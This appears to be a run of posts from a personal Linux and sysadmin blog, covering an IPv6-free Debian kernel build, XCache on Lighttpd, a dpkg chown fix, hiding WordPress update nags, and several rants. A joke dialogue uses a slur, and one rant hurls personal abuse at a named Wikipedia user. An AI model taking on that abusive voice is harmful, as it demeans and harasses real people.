With the native implementation in modern operating systems and software, IPv6 support has grown in recent years; however, the existing infrastructure just isn't ready. As a result, a number of applications behave as though an IPv6 network is available, which not only wastes CPU cycles, but can also decrease application response time. Fortunately for Debian users (and other Linux users, too I imagine), there is a way to remove this functionality completely. This entry isn't like those other crap articles you've probably read that just add an alias in aliases.conf or comment out some stuff in blacklist.conf; we're going to compile a custom kernel, and it's easier than you might think.

Get Ready: Tools, Packages, Environment

$ sudo aptitude update; sudo aptitude install build-essential fakeroot kernel-package
$ sudo mkdir /usr/src/KERNEL
$ sudo chown -R some_user:some_group /usr/src/KERNEL
$ cd /usr/src/KERNEL
$ sudo apt-get source linux-source-2.6.32
$ sudo chown -R some_user:some_group /usr/src/KERNEL; cd linux-2.6-2.6.32
$ cp /boot/config-2.6.32-5-amd64 .config
$ export CONCURRENCY_LEVEL=5
$ vim Makefile

Before you start asking, "What the hell is all that?", I'll go over each command. The first command updates the apt package cache and installs the packages we'll need to configure and compile our new IPv6less kernel. The second command creates a directory for the kernel source and the third makes sure the normal user (not root!) owns the directory.

Next, we change directories to the new folder and use apt-get to pull down the kernel source code. The file and folder ownership is then recursively updated so the normal user (not root!) owns the files. We then change directories to the kernel source folder we downloaded with apt-get, linux-2.6.2.6.32.

The existing kernel config is then copied over to, .config, which is what we'll use as a basis for the new kernel. Replace "2.6.32-5-amd64" with YOUR existing kernel. Execute "uname -r" to find this out. For multi-core processors, set the CONCURRENCY_LEVEL environmental variable to ensure make-kpkg utilizes all available cores when compiling our new kernel. Quad cores can use "5" (as shown above) and dual core can use "3" - adjust accordingly. There are disputes about whether or not this actually decreases compilation time, but I'm not too concerned since setting it doesn't hurt anything.

Finally, open /usr/src/KERNEL/linux-2.6-2.6.32/Makefile and change the "EXTRAVERSION" variable to whatever you prefer. Below is what I put in mine:

VERSION = 2
PATCHLEVEL = 6
SUBLEVEL = 32
EXTRAVERSION = -5-amd64-NoIP6
NAME = Man-Eating Seals of Antiquity

Configure The Replacement Kernel

$ make oldconfig
  HOSTCC  scripts/basic/fixdep
  HOSTCC  scripts/basic/docproc
  HOSTCC  scripts/basic/hash
  HOSTCC  scripts/kconfig/conf.o
  HOSTCC  scripts/kconfig/kxgettext.o
  SHIPPED scripts/kconfig/zconf.tab.c
  SHIPPED scripts/kconfig/lex.zconf.c
  SHIPPED scripts/kconfig/zconf.hash.c
  HOSTCC  scripts/kconfig/zconf.tab.o
  HOSTLD  scripts/kconfig/conf
scripts/kconfig/conf -o arch/x86/Kconfig
#
# using defaults found in /boot/config-2.6.32-5-amd64
#
#
# configuration written to .config
#
$ make xconfig

Find the section pictured below (Networking support -> Networking options -> TCP/IP networking -> The IPv6 protocol -> The IPv6 protocol") and unselect/uncheck the "The IPv6 protocol" option.

There are dozens of options you can disable for increased performance. For example, if you know you'll never install or use a bluetooth device, why bother compiling support into the kernel? What about joysticks or old 56k modem drivers? Don't need 'em? Get rid of 'em. I've spent an hour or two going through the options one by one and believe it was time well spent.

Start Building The IPv6less Kernel

$ cd .. (move into /usr/src/KERNEL, type: pwd to confirm)
$ mv linux-2.6-2.6.32 linux-2.6.32.NoIP6; cd linux-2.6.32.NoIP6/
$ make-kpkg clean --arch=amd64 --subarch=x86_64
$ fakeroot make-kpkg --initrd --revision 2 kernel_image kernel_headers --arch=amd64 --subarch=x86_64

This is the part that takes a while... Go grab some coffee or something. Once the kernel is compiled, cd back into /usr/src/KERNEL and look for the following:

$ ls -lah /usr/src/KERNEL |grep .deb
-rw-r--r--  6.1M Aug  3 10:57 linux-headers-2.6.32-5-amd64-NoIP6_2_amd64.deb
-rw-r--r--   22M Aug  3 10:56 linux-image-2.6.32-5-amd64-NoIP6_2_amd64.deb
$

Hooray! If no, goto: 1.

Build nVidia Driver Support

If you have an nVidia card and want to build the drivers before booting into your new IPv6less kernel, it's really easy.

$ cd .. (move back into /usr/src/KERNEL)
$ sudo m-a -t -k linux-2.6.32.NoIP6/ -l linux-2.6.32.NoIP6 a-b nvidia

If that doesn't work, add the "non-free" section to your apt sources.list, run aptitude update, and make sure the "nvidia-kernel-source" and "nvidia-kernel-common" packages are installed. Then try again.

Install The New Kernel

Wow, FINALLY, right? This is the easiest and most rewarding part of the entire process.

$ sudo dpkg -i linux-headers-2.6.32-5-amd64-NoIP6_2_amd64.deb linux-image-2.6.32-5-amd64-NoIP6_2_amd64.deb
$ cat /boot/grub/grub.cfg | grep -i 'noip6'
or for Lenny...
$ cat /boot/grub/menu.lst | grep -i 'noip6'
$ sudo shutdown -r -t 0 now
After reboot to confirm:
$ uname -a
Linux q9550.nullamatix.com 2.6.32-5-amd64-NoIP6 #1 SMP PREEMPT Fri Oct 1 10:45:38 EDT 2010 x86_64 GNU/Linux
$ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:01:02:03:00:01
          inet addr:192.168.254.200  Bcast:192.168.254.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:214841 errors:0 dropped:0 overruns:0 frame:0
          TX packets:214841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:10752020 (10.2 MiB)  TX bytes:10752020 (10.2 MiB)

Notice the lack of an "inet6" address, now. Win.

Squeeze sources.list For nVidia Support

#############################################################
## add contrib & non-free for built-in nvidia support     ###
#############################################################
$ grep '^deb' /etc/apt/source.list
deb http://ftp.us.debian.org/debian/ squeeze main contrib non-free
deb-src http://ftp.us.debian.org/debian/ squeeze main contrib non-free
deb http://security.debian.org/ squeeze/updates main contrib non-free
deb-src http://security.debian.org/ squeeze/updates main contrib non-free

This was written several weeks after I did this on my own system. If I missed something, something's screwed up, or there's a better way, please let me know by submitting a comment or emailing me.

See Also:

• 03/05/2008 -- What’s Your Computer Connecting To?
  Excerpt: "A security conscious buddy of mine is an advocate of the Sysinternals freeware utilities. For those of you who don't know, Mark Russinovich, one of the Sysinternals co founders, was the guy that discovered and exposed the Sony BMG root kit back in 2005. In ..."
  
• 02/22/2008 -- U.S. Internet Service Providers Should Be Ashamed
  Excerpt: "The majority of Internet users are aware of what's going on with Comcast and their throttling practices, the idea of a tiered and non neutral Internet, immunity to the telco's for warrantless wiretapping, and countless other crimes that go completely against ..."
  
• 02/15/2008 -- Picture: The Importance of a Good Firewall
  Excerpt: "This is what happened when I took down my network's defenses the other day. Fortunately my Windows machines were patched, or I might have been hit with a nasty remote exploit, or eighty. Click the thumbnail for the larger version. Those are all incoming ..."
  
• 10/17/2007 -- Finally, a Resolution to Comcast’s Connectivity & Latency Issue Nightmare
  Excerpt: "Comcast is slowly training their loyal customers to embrace what many are calling the end of the free, neutral, Internet. Several individuals, myself included, continuously experience a diminishing quality of service from Comcast. A couple examples include: ..."
  

A couple folks have reported the video isn't playing for them. If you're one of 'em, here's a link to the original.

iPhone 4 vs. HTC Evo:

Salesman: Welcome to Phone-Mart; how may I help you?

Customer: iPhone 4. Where is the iPhone 4? I need an iPhone 4.

S: Oh I'm very sorry but we are currently sold out. However we did finally get some more HTC Evo's in.

C: What? What is that? Is it an iPhone?

S: No. It is that 4G Phone on Sprint.

C: If it's not an iPhone, why would I want it?

S: Well it's similar to an iPhone, but has a bigger screen...

C: I don't care

S: The internet speeds are around 3 times faster...

C: I don't care

S: It has a higher resolution camera on both the front and the back...

C: I don't care

S: and it doesn't require you to be on WiFi to use video chat...

C: I don't care

S: it's battery is replaceable; as is the memory card...

C: I don't care

S: it is highly customizable. Everything from the widgets to the icons to the fonts and even has video wallpaper.

C: I don't care

S: the monthly bill is cheaper...

C: I don't care

S: it prints money.

C: I don't care

S: it can grant up to three wishes; even if one of those wishes is for the iPhone...

C: I don't care

S: it has an app that will build you an island and then it transforms into a jet and flies you there...

C: I don't care

S: It's Indestructible...

C: I don't care about any of that

S: Okay fine. then what the hell entices you about the iPhone 4, if you don't mind me asking?

C: It is an iPhone

S: You do realize that doesn't mean anything? It's a brand. They could put out a brick and call it an iPhone if they wanted to.

C: Yes. But it's the best phone

S: Can you explain how?

C: I can download apps to it.

S: Big deal. My eight year old niece's Boost mobile phone has apps on it.

C: It's 3G. And has the Wi-Fi's.

S: WTF - Do you even know what that means?

C: Um.It canIIt...Um

S: Listen I'm out of the IPhone anyway. I guess if you're fine using AT&T's network and don't mind paying for the plan and the phone and also don't mind having a brand new phone that's already behind the curve, then I can put you on our reservation list

C: No. I'll just try somewhere else. I have to have it today.

S: Are you serious? Not only are you so stupid that you still want this device, but you are also so retarded that you think you can just waltz into any store and purchase one on launch day without a pre-order?

C: Yes

S: I think I think I need to go chop off my own **** now. Yes. I think I will. I don't need my children growing up in a world populated by **** like you.

C: I need an iPhone 4

S: If you don't leave I'm going to go find one for you and shove it so far up your ...

C: I want the one with the bigger GB's.

S: Oh God. I think I just had an aneurysm. I'm dying. Are you happy? Your stupidity has killed me. Now my cat is homeless. I'm no longer alive. I'm dead.

C: I need the white one. Hello. I need one now please. Can you waive the activation fee? Does it come with a case? I also need you to hook up my Bluetooth to it. Hello? Hello? I'll go somewhere else. My sister said Walgreens has them. Goodbye.

See Also:

• 05/03/2009 -- Rackmount Hammock – Server Room Accessory
  Excerpt: "In response to the redditor seeking appropriate server room accessories, behold!: Did I Win The Rackmount Hammock Game? Hammock in a Server Room Game Server Room with a Hammock Data Center with a Hammock"
  
• 01/21/2008 -- Linux Requires Windows – No, Seriously
  Excerpt: "Just when you thought you've seen everything, the Internet comes to the rescue. Enter: jerryleecooper and boy he sure has a special treat for everyone. Here's an excerpt of this guy's beautiful logic. You are kidding arent you ? Are you saying that this ..."
  
• 01/20/2008 -- Hackers Lay Off Death Video
  Excerpt: "Anyone else remember this? Took place in June of 2001. Makes me feel old. After a four-minute glitch preparing the video link between Indiana and Oklahoma, the families of the victims of the Oklahoma City bombing viewed an encrypted signal of Timothy ..."
  
• 01/02/2008 -- Nullamatix Visitors Are Major Geeks
  Excerpt: "One of my readers informed me, This is what I do when there aren't new posts on Nullamatix... Thanks for sharing! I've had quite a few negative remarks as a result of not posting as frequently. I'll have to do something about that. I am open to ..."
  

In Windows: 'Start' > 'Run...' > type in 'services.msc' into the text-input field and press 'Enter'. Locate the redundantly named "SSDP Discovery Protocol" > right click > left click 'Properties' Under the 'General' tab, locate 'Startup type.' Select 'Disable,' then click 'Apply.' Locate "Universal Plug and Play" and repeat steps 2-3. If this solves your problem, good for you. If this doesn't solve your problem, proceed to step 6. Type your private default gateway address* into the address bar of your internet browser. Submit user name & password to login into your router [for the purpose of this Howto, a Linksys will be used]. Go to the 'Password tab' and identify 'UPnP Services.' Check 'Disable,' then select 'Apply.' Logout of the router, or close your browser tab and clear the cookies from this session.

End.

* private default gateway can be found by:

a) 'Start' > 'Run...' > type 'cmd' > press 'Enter'

b) Type 'ipconfig' into the command prompt > press 'Enter'

c) Locate the ip address after 'Default Gateway:'

This is a guest post by bocifus.

Editor's Note: Unfortunately, Bocifus doesn't have a web-site or I would have passed on some link juice... Thanks for the submission!

See Also:

• 08/17/2009 -- Howto: Windows XP/Server 2003 Null Route
  Excerpt: "Linux and most other Unix derivatives provide the ability to create null routes. Let's say for instance a Linux server is being attacked by hundreds of IPs from 124.151.0.0/16. No problem.. [root@nullamatix ~]# route add -net 124.151.0.0/16 ..."
  
• 12/17/2007 -- Howto: Remote Desktop At Work, Evading A Firewall
  Excerpt: "A lot of organizations intentionally block remote desktop capabilities. With that in mind, please be aware that following the instructions in this post may lead to consequences depending on policies outlined within your organization. This guide will ..."
  
• 03/05/2008 -- What’s Your Computer Connecting To?
  Excerpt: "A security conscious buddy of mine is an advocate of the Sysinternals freeware utilities. For those of you who don't know, Mark Russinovich, one of the Sysinternals co founders, was the guy that discovered and exposed the Sony BMG root kit back in 2005. In ..."
  
• 02/23/2008 -- Internet and Computer Networking Security Tips
  Excerpt: "Note: This is a guest post by Scott Hughes, administrator of Philosophy Forums. For most experienced computer users, basic security is common sense. Computer professionals and computer geeks usually know how to protect their computer and privacy. But most ..."
  

Rapid7's NeXpose

In other news, NeXpose Enterprise from Rapid7 is fcking awesome. If you're a Qualys fan or a security professional, NeXpose is one of the better vulnerability, policy, and remediation management tools I've seen in a long time. In the interest of full disclosure, Rapid7 did not pay or ask me to say the above...

WordPress Themes

For the past few weeks I've been working on a WordPress theme previewer on and off (in all my spare time). Why? Most WordPress theme sites suck and I prefer relying on internal (LAN) resources as much as possible. The archive currently has 2,450+ themes available and will have more if/when the project is made available to the public. Still need to work on a few things to get polished up for "production" use.

Debian Squeeze

Debian's Squeeze, version 6.0 of my favorite GNU/Linux distribution, is also fcking awesome. The boot-up time on my Q9550 was cut in half, loads of applications have been updated, and I'm happier than a pig in mud. Kudos and my sincerest appreciation to the folks that continue to make Debian happen - you're my heroes.

Loads of other stuff is happening and I'll do my best to get some more posts out, but I mainly wanted to notify everyone about the comment issue.

See Also:

• 10/01/2010 -- Disable IPv6 The Right (Debian) Way
  Excerpt: "IPv4 has been in place for around 30 years now and is still a testament to human ingenuity. Unfortunately, IPv4 is limited to approximately 4.3 billion addresses, 0.0.0.0 - 255.255.255.255. As more cities in more countries get connected to the Internet, the ..."
  
• 04/11/2010 -- Howto: XCache in a Lighttpd Chroot on Debian
  Excerpt: "Whether you're pressed for resources on a virtual/dedicated server, or simply looking for ways to improve web application performance, XCache is guaranteed to produce the desired result. Within minutes of installing XCache: page load times were cut in half, ..."
  
• 01/21/2010 -- Discontinued Security Support for Debian 4.0
  Excerpt: "One year after the release of Debian GNU/Linux 5.0 alias 'lenny' and nearly three years after the release of Debian GNU/Linux 4.0 alias 'etch' the security support for the old distribution (4.0 alias 'etch') is coming to an end next month. The Debian project ..."
  
• 01/10/2010 -- Solution: chown: invalid user: www-data:www-data
  Excerpt: "Ran into this issue after getting rid of the www-data user and group. The solution is simple and doesn't involve adding the account/group, assuming the objective is to run Lighttpd as a different user (not www-data). If the intention is to run Lighttpd with ..."
  

What is XCache?

Hopefully you're already aware, but just in case... :

XCache is a fast, stable PHP opcode cacher that has been tested and is now running on production servers under high load. It is tested on linux and supported under Windows, for thread-safe and non-thread-safe versions of PHP. This relatively new opcode caching software has been developed by mOo, one of developers of Lighttpd, to overcome some of the limitations of the existing solutions at that time; such as being able to use it with new PHP versions as they arrive.

Assumptions / Conditions

This tutorial assumes Lighttpd (>= 1.4.23-3+b2) is already setup and running in a chroot environment with php5/fastcgi enabled and working. Also assumes a minimum of 64 megabytes of RAM is available. If you're looking for a Lighttpd chroot setup guide, I highly recommend this one.

Install XCache

Login to your Debian server and obtain root (sudo, su, whatever) and run the following:

[184][vps ~]:# aptitude install php5-xcache

Put XCache in the Lighttpd chroot:

[185][vps ~]:# cp -avr /usr/share/xcache /chroot/usr/share/
[186][vps ~]:# cp -avr /usr/lib/php5/20060613+lfs/xcache.so /chroot/usr/lib/php5/20060613+lfs/
[187][vps ~]:# l2chroot /usr/lib/php5/20060613+lfs/xcache.so
[188][vps ~]:# cat /etc/php5/conf.d/xcache.ini > /chroot/etc/php5/conf.d/xcache.ini
[189][vps ~]:# vi /etc/lighttpd/lighttpd.conf

Create an alias to access the XCache Administration pages:

$HTTP["host"] =~ "some-domain.tld" {
	alias.url = ( "/xcache-admin/" => "/usr/share/xcache/admin/" )
}

Save changes to lighttpd.conf and quit (:wq!). See this page for the l2chroot script.

Setup XCache

Generate a password using the "md5sum" command and create/edit xcache.ini settings file.

[190][vps ~]:# echo -n "your_desired_password" | md5sum
c889e0b89df36eaa47f3a71675d1e9f4
[191][vps ~]:# vi /chroot/etc/php5/conf.d/xcache.ini

The following settings work for my purposes. You may need to consult the XCache docs and adjust according to your environment. Plenty of information out there - use the goog.

[xcache-common]
extension = xcache.so

[xcache.admin]
xcache.admin.enable_auth = On
xcache.admin.user = "xcadmin"
xcache.admin.pass = "c889e0b89df36eaa47f3a71675d1e9f4"

[xcache]
xcache.shm_scheme = "mmap"
xcache.size = 96M
xcache.count = 8
xcache.slots = 8K
xcache.ttl = 0
xcache.gc_interval = 0
xcache.var_size = 16M
xcache.var_count = 1
xcache.var_slots = 8K
xcache.var_ttl = 0
xcache.var_maxttl = 0
xcache.var_gc_interval = 300
xcache.test = Off
xcache.readonly_protection = Off
xcache.mmap_path = "/dev/zero"
xcache.coredump_directory = ""
xcache.cacher = On
xcache.stat = On
xcache.optimizer = Off

[xcache.coverager]
xcache.coverager = Off
xcache.coveragedump_directory	= ""

Finalize & Test

If a /chroot/dev/zero special device doesn't exist, go ahead and create one, now. Finally, restart Lighttpd and visit the XCache Administration page (the alias created above).

[192][vps ~]:# mknod /chroot/dev/zero c 3 4
[193][vps ~]:# /etc/inti.d/lighttpd restart

A page resembling the screen-shot below should appear after logging in (click for full-size).

The Lighttpd wiki suggests setting 1 "max-procs" and several "PHP_FCGI_CHILDREN" in 10-fastcgi.conf. For some reason that particular setup only lasts 20 to 30 minutes before crashing. Here's the setup used at the time the screen-shot above was taken which happens to work for me (so-far).

server.modules += ( "mod_fastcgi" )
fastcgi.server = ( ".php" => ((
	"bin-path" => "/usr/bin/php5-cgi",
	"socket" => "/var/tmp/lighttpd/php5-cgi.socket",
	"max-procs" => 2,
	"idle-timeout" => 20,
	"bin-environment" => (
		"PHP_FCGI_CHILDREN" => "5",
		"PHP_FCGI_MAX_REQUESTS" => "5000"
	),
	"bin-copy-environment" => ( "PATH", "SHELL", "USER" ),
	"broken-scriptfilename" => "enable"
)) )

Result is 2 parent php5-cgi processes with 5 children each:

/usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi
	 \_ /usr/bin/php5-cgi

Enjoy! Comments are open...

See Also:

• 12/10/2009 -- 529 Attacks in 9 Days: id1.txt, RFI, & More
  Excerpt: "Long time Nullamatix readers know how much I love reviewing log files. Logs can provide detailed incite into not only the overall health of a system, but information one can use to mitigate the risks of automated attacks. In this post, I'll go over a couple ..."
  
• 08/14/2009 -- Howto: Tail Lighttpd Logs with Style using Sed
  Excerpt: "Although extremely useful, http server access logs are a mess in their raw form. If you're interested in watching your http server logs in real time with formatting rules and pretty colors, this post is for you. Teh Scr1pt Create a new file to put the l33t ..."
  
• 01/10/2010 -- Solution: chown: invalid user: www-data:www-data
  Excerpt: "Ran into this issue after getting rid of the www-data user and group. The solution is simple and doesn't involve adding the account/group, assuming the objective is to run Lighttpd as a different user (not www-data). If the intention is to run Lighttpd with ..."
  
• 08/31/2009 -- Howto: Insert Bash Command Output Into MySQL
  Excerpt: "A BlogStorm reader emailed me today, Hello, I am replying to your post on http://www.blogstorm.co.uk/how-to-scrape-pages-with-coldfusion/ Wanted to see your experience in page scraping, may need your help on a project. HOw much did you do beyond the ..."
  

From the dev.suckless.org mailing list,

From: Thayer Williams
Date: Wed, 24 Feb 2010 08:10:56 -0800

On Wed, Feb 24, 2010 at 1:25 AM, Jason Ryan wrote:
> It points to a deficiency in the way Wikipedia views notability: it is quite
> at odds with the notion of influence and derivation that powers free and
> open source software...

Agreed. I said as much too. Under the current Wikipedia guidelines,
the vast majority of FOSS (and some proprietary) articles should be
deleted. It's unfortunate and more than little ironic that a
community-based 'open' encyclopedia would undermine the exposure of
other community-oriented projects.

My hero and dependable source of entertainment for the day, Uriel, replied back with:

From: Uriel
Date: Wed, 24 Feb 2010 20:42:03 +0100

The only thing that matters in wikipedia is your bureaucratic skills. You Germans should be able to master it!

uriel

Good job, Wikipedia. If you guys are going to start purging GNU/FOSS related pages, why don't you go ahead and sign an advertising contract with Microsoft? dwm is one of the few window managers worth using and because dwm is "possibly non-notable" and lacking third-party sources (for what?), "the article clearly fails Wikipedia:Notability." Wikipedia has become a money hungry community that seems to have lost focus, especially when pages are up for deletion because,

I can't find anything myself via Google, though perhaps someone with better Google-fu can turn something up.

So let me get this straight: no Google = non-notable = no Wikipedia page. Wikipedia, you'll never see a dime from me you greedy corporate sell out whores. You beg your users for money and purge pages that lack corporate sponsorship? Next time you're looking for hand-outs, hit your big rich corporate buddies up. Wikipedia user "Psychonaut" - eat sh-t and live you nosy, racist, biased, deceptive prick. Seriously.

Relevant Links:

• http://jasonwryan.com/post/409379904/wikipedia
• http://dwm.suckless.org/
• http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion/Dwm#Dwm
• http://lists.suckless.org/dev/1002/index.html

See Also:

• 07/31/2009 -- Howto: Lock Your Screen in dwm with WindowsKey+L
  Excerpt: "A couple months ago I gave up all those fancy buttons, panels, widgets, icons, and other miscellaneous crap that make using a computer annoying, for a more simplistic approach. The dynamic window manager from suckless provides anything the casual web surfer ..."
  
• 12/09/2007 -- Wikipedia Germany Contains Too Much Nazi Symbolism
  Excerpt: "Katina Schubert, a high official in the German's Left Party, informed reporters that she's filed charges with the Berlin Police against Wikipedia. Her highly opinionated claim is that Wikipedia's German site has too much Nazi symbolism and excessive amounts ..."
  

Debian Security Advisory DSA-1975-1

Security Support for Debian GNU/Linux 4.0 to be discontinued on February 15th

http://www.debian.org/security/ - Stefan Fritsch - January 20, 2010

The Debian project has released Debian GNU/Linux 5.0 alias 'lenny' on the 14th of February 2009. Users and Distributors have been given a one-year timeframe to upgrade their old installations to the current stable release. Hence, the security support for the old release of 4.0 is going to end in February 2010 as previously announced. Previously announced security updates for the old release will continue to be available on security.debian.org.

Security Updates for Lenny

The Debian Security Team provides security updates for the current distribution via . Security updates for the old distribution are also provided for one year after the new distribution has been released or until the current distribution is superseded, whatever happens first.

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: apt-cache show and http://packages.debian.org/

See Also:

• 10/01/2010 -- Disable IPv6 The Right (Debian) Way
  Excerpt: "IPv4 has been in place for around 30 years now and is still a testament to human ingenuity. Unfortunately, IPv4 is limited to approximately 4.3 billion addresses, 0.0.0.0 - 255.255.255.255. As more cities in more countries get connected to the Internet, the ..."
  
• 08/30/2010 -- Comment Posting Issue and Other Misc.
  Excerpt: "Unfortunately, if you've posted a comment to a Nullamatix.com post between July 24th and August 29th, they weren't submitted to the queue for approval. This was due to a php.ini setting modification in an effort to enhance security. My apologies if anyone ..."
  
• 04/11/2010 -- Howto: XCache in a Lighttpd Chroot on Debian
  Excerpt: "Whether you're pressed for resources on a virtual/dedicated server, or simply looking for ways to improve web application performance, XCache is guaranteed to produce the desired result. Within minutes of installing XCache: page load times were cut in half, ..."
  
• 01/10/2010 -- Solution: chown: invalid user: www-data:www-data
  Excerpt: "Ran into this issue after getting rid of the www-data user and group. The solution is simple and doesn't involve adding the account/group, assuming the objective is to run Lighttpd as a different user (not www-data). If the intention is to run Lighttpd with ..."
  

Using IP to CIDR

The tool is very easy to use. The first text input field is the first IP address or start of the range. The second text input field is the second IP address or end of the range. For instance, supplying 172.0.0.0 in the first field and 192.168.255.255 in the second field will produce:

192.0.0.0/9
192.128.0.0/11
192.160.0.0/13
192.168.0.0/16
172.0.0.0/6
176.0.0.0/4

172.16.0.0 and 172.17.255.255 will produce:

172.16.0.0/15

I'll eventually implement on-the-fly htaccess, null route, and iptables policy generation.

IPtables Drop Policies

In addition to the new IP Range to CIDR tool, I've also added drop lists for ThePlanet, Softlayer, APNIC, and Amazon, courtesy of robtex.com. While looking over firewall and httpd access logs, malicious attacks and comment spam seem to originate from these sources the most. If there's a network or company you'd like me to add, just submit a comment to this post.

See Also:

• 11/22/2009 -- Count the Total Number of IPs From CIDR
  Excerpt: "After adding a few IPs to a firewall drop list, I wondered, "exactly how many IPs are in this drop list?" Since the list contained 187 entries, all in CIDR notation, adding up the total number of IPs in my head was impossible. So, I put together this little ..."
  
• 12/28/2009 -- Invalid Packets From the DoD
  Excerpt: "The firewall policies on Nullamatix.com DROP invalid connection attempts. Specifically, if an attempt to start a new tcp connection is not a syn packet, the packet is rejected. This morning I noticed a few dropped connection attempts from an unusual source, ..."
  
• 05/13/2009 -- IPTables Drop Log For 05.12.09
  Excerpt: "The Internet; so magical and dangerous, getting connected is a risk we're all willing to take. Whether you're infiltrating some moron's botnet, or just surfing the web, the possibility of becoming a victim in a cyber attack is real. Everyday, without fail, ..."
  
• 01/22/2008 -- 301 Redirect Codes For PHP, ASP, Coldfusion, and More
  Excerpt: "301 is an HTTP status code that basically instructs search engines and browsers that a page has moved, permanently. If you've changed a file name, domain, folder path, whatever, a 301 redirect will update the search engines. This ensures your content remains ..."
  

The Issue

[599][nullamatix ~]:# aptitude install package-x
Reading package lists... Done
Building dependency tree
Reading state information... Done
Reading extended state information
Initializing package states... Done
Reading task descriptions... Done
The following NEW packages will be installed:
  package-x
The following partially installed packages will be configured:
  lighttpd lighttpd-mod-magnet
0 packages upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 220kB of archives. After unpacking 1028kB will be used.
Writing extended state information... Done
Get:1 http://ftp.us.debian.org lenny/main package-x [220kB]
Fetched 220kB in 0s (446kB/s)
Preconfiguring packages ...
Selecting previously deselected package package-x.
(Reading database ... 23009 files and directories currently installed.)
Unpacking package-x (from .../package-x_i386.deb) ...
Processing triggers for man-db ...
Setting up lighttpd (1.4.25-1) ...
chown: invalid user: `www-data:www-data'
dpkg: error processing lighttpd (--configure):
 subprocess post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of lighttpd-mod-magnet:
 lighttpd-mod-magnet depends on lighttpd (= 1.4.25-1); however:
  Package lighttpd is not configured yet.
dpkg: error processing lighttpd-mod-magnet (--configure):
 dependency problems - leaving unconfigured
Setting up package-x (lenny3) ...
Adding group `package-x' (GID 119) ...
Done.
Adding system user `package-x' (UID 117) ...
Adding new user `package-x' (UID 117) with group `package-x' ...
Not creating home directory `/var/run/package-x.
Starting package-x: package-x.
Errors were encountered while processing:
 lighttpd
 lighttpd-mod-magnet
E: Sub-process /usr/bin/dpkg returned an error code (1)
A package failed to install.  Trying to recover:
Setting up lighttpd (1.4.25-1) ...
chown: invalid user: `www-data:www-data'
dpkg: error processing lighttpd (--configure):
 subprocess post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of lighttpd-mod-magnet:
 lighttpd-mod-magnet depends on lighttpd (= 1.4.25-1); however:
  Package lighttpd is not configured yet.
dpkg: error processing lighttpd-mod-magnet (--configure):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 lighttpd
 lighttpd-mod-magnet
Reading package lists... Done
Building dependency tree
Reading state information... Done
Reading extended state information
Initializing package states... Done
Writing extended state information... Done
Reading task descriptions... Done         

[600][nullamatix ~]:#

The Solution

Open the Lighttpd postint file and replace www-data with the correct username:group.

[600][nullamatix ~]:# /var/lib/dpkg/info/lighttpd.postinst

There were 2 lines for this particular instance:

# old original
# chown www-data:www-data /var/log/lighttpd /var/run/lighttpd
# chown www-data:www-data /var/cache/lighttpd /var/cache/lighttpd/compress /var/cache/lighttpd/uploads

# new replacement
chown custom-user:custom-group /var/log/lighttpd /var/run/lighttpd
chown custom-user:custom-group /var/cache/lighttpd /var/cache/lighttpd/compress /var/cache/lighttpd/uploads

Save the changes and exit. Now, assuming custom-user and custom-group exist, tell dpkg to reconfigure the packages. The -a flag tells dpkg to reconfigure, "all unpacked but unconfigured packages."

[601][nullamatix ~]:# dpkg --configure -a
Setting up lighttpd (1.4.25-1) ...
Starting web server: lighttpd.
Setting up lighttpd-mod-magnet (1.4.25-1) ...
[602][nullamatix ~]:#

That's it, problem solved...

See Also:

• 04/11/2010 -- Howto: XCache in a Lighttpd Chroot on Debian
  Excerpt: "Whether you're pressed for resources on a virtual/dedicated server, or simply looking for ways to improve web application performance, XCache is guaranteed to produce the desired result. Within minutes of installing XCache: page load times were cut in half, ..."
  
• 12/10/2009 -- 529 Attacks in 9 Days: id1.txt, RFI, & More
  Excerpt: "Long time Nullamatix readers know how much I love reviewing log files. Logs can provide detailed incite into not only the overall health of a system, but information one can use to mitigate the risks of automated attacks. In this post, I'll go over a couple ..."
  
• 08/14/2009 -- Howto: Tail Lighttpd Logs with Style using Sed
  Excerpt: "Although extremely useful, http server access logs are a mess in their raw form. If you're interested in watching your http server logs in real time with formatting rules and pretty colors, this post is for you. Teh Scr1pt Create a new file to put the l33t ..."
  
• 02/11/2008 -- Howto: Setup cron Jobs to Restart Lighttpd & MySQL
  Excerpt: "Over the past couple weeks MySQL crashed when spiked with large amounts of traffic. To remedy this, a cron job has been implemented to simply restart mysql and lighttpd every other day. Here's how it's done. First, if you haven't already, define a cron job ..."
  

Locating the "hook"

[874][nullamatix.com http]:# grep -lir 'update_nag' wp-admin/
wp-admin/includes/update.php
[875][nullamatix.com http]:# vim wp-admin/includes/update.php

Removing the "hook"

Once update.php is open, find this line (around 135 or so):

add_action( 'admin_notices', 'update_nag', 3 );

Then, just make the line a comment; either of the following will work:

// add_action( 'admin_notices', 'update_nag', 3 );
/* add_action( 'admin_notices', 'update_nag', 3 ); */

Save the changes and check out the admin panel. Ta-da, no more WordPress update nag and we didn't even have to worry about some silly plug-in...

Wat? No Updates?

Wrong. There are still a number of ways to tell whether or not WordPress needs an update. Here are a few:

• Check the footer of the admin interface (Get Version 2.9.1)
• Check the "Right Now" box in the admin dashboard
• Subscribe to the WordPress "Releases" category RSS feed

WordPress Security Updates Only

Unrelated, but still worth mentioning, Steve Taylor asked the following question on the wp-hackers mailing list today,

